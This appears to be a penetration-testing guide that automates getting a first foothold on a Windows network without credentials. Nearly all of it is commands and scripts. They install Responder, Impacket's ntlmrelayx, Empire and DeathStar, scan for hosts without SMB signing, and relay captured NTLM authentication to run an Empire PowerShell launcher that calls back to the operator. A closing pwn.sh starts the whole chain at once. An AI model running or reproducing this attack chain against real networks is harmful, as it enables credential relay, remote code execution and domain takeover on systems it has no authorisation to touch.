This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.
Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
However, if I install other tools like Empire first, then the impacket install complains about not being able to install/uninstall the updated version. In raising this issue it looks like the way to handle that is:
sudo apt-get remove python-impacket
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
However, by doing that it rips out a bunch of other packages, so then you have to reinstall them with something like:
apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y
So long story short: handle the ntlmrelayx install with care.
git clone https://github.com/EmpireProject/Empire.git /opt/empire
cd /opt/empire
./setup/install.sh
git clone https://github.com/byt3bl33d3r/DeathStar.git /opt/deathstar
git clone https://github.com/lgandx/Responder.git /opt/responder
Now open /opt/responder/Responder.conf and turn SMB and HTTP to off:
[Responder Core]
; Servers to start
SQL = On
SMB = Off <-- it's usually "On" so change to "Off"
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off <-- it's usually "On" so change to "Off"
HTTPS = On
DNS = On
LDAP = On
mkdir /scripts
cd /scripts
/opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
The resulting targets.txt should have a list of IPs with SMB signing disabled:
192.168.55.36
192.168.55.144
192.168.55.199
...
sudo mkdir /scripts
cd /scripts
sudo echo "cd /opt/empire" > empire.sh
sudo echo "sudo ./empire --rest --username empireadmin --password Password123" >> empire.sh
sudo echo "sudo /opt/deathstar/DeathStar.py --listener-ip YOUR.IP -t 100" > deathstar.sh
sudo echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." > ntlmrelayx.sh
sudo echo "sudo python /opt/impacket/examples/ntlmrelayx.py -tf targets.txt -c 'YOUR.POWERSHELL'" >> ntlmrelayx.sh
sudo echo "sudo python /opt/responder/Responder.py -I YOUR-LAN-INTERFACE -r -d -v" > responder.sh
Now open up all the scripts created in /scripts and adjust as necessary. Note: you won't be able to totally fill in the necessary info for empire.sh just yet, so wait until you proceed to the next section:
cd /scripts
chmod +x deathstar.sh
chmod +x empire.sh
chmod +x ntlmrelayx.sh
chmod +x responder.sh
Get Empire running in a screen session:
cd /scripts
screen -S empire -dm -L /scripts/empire.sh
Get DeathStar running in a screen session:
screen -S deathstar -dm /scripts/deathstar.sh
Connect to the Empire screen session
screen -R empire
At the empire prompt, run these commands to get the DeathStar PowerShell code:
listeners
launcher powershell DeathStar
Now press Ctrl+A and then D to exit the screen session. In /scripts there should be a screenlog.0 file, which is a log file of everything happening in the Empire screen session. Do a cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==
Next, open /scripts/ntlmrelayx.sh and where you see YOUR-POWERSHELL paste the PowerShell that you got in the previous steps. Remember that in this script, there's a tick at the start of powershell and then a closing tick at the end of your PowerShell code.
Run a new screen session with ntlmrelayx:
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
Note: you might find that when running ntlmrelayx.sh the console barfs up some weird error like:
Traceback (most recent call last):
File "examples/ntlmrelayx.py", line 45, in <module>
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/__init__.py", line 1, in <module>
from httprelayserver import HTTPRelayServer
File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 27, in <module>
from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/__init__.py", line 3, in <module>
from ldaprelayclient import LDAPRelayClient
File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 17, in <module>
from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS
If that happens, you may need to rip and replace your version of impacket. See the section above where I address this, as well as the GitHub issue here that should help you.
Run a new screen session with Responder:
screen -S responder -dm /scripts/responder.sh
Keep an eye on Empire and DeathStar screen sessions to watch the shells come pouring in:
screen -R empire
screen -R deathstar
Have fun :-)
Put the following commands in a file called /scripts/pwn.sh
screen -S empire -dm -L /scripts/empire.sh
screen -S deathstar -dm /scripts/deathstar.sh
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
screen -S responder -dm /scripts/responder.sh
Resources: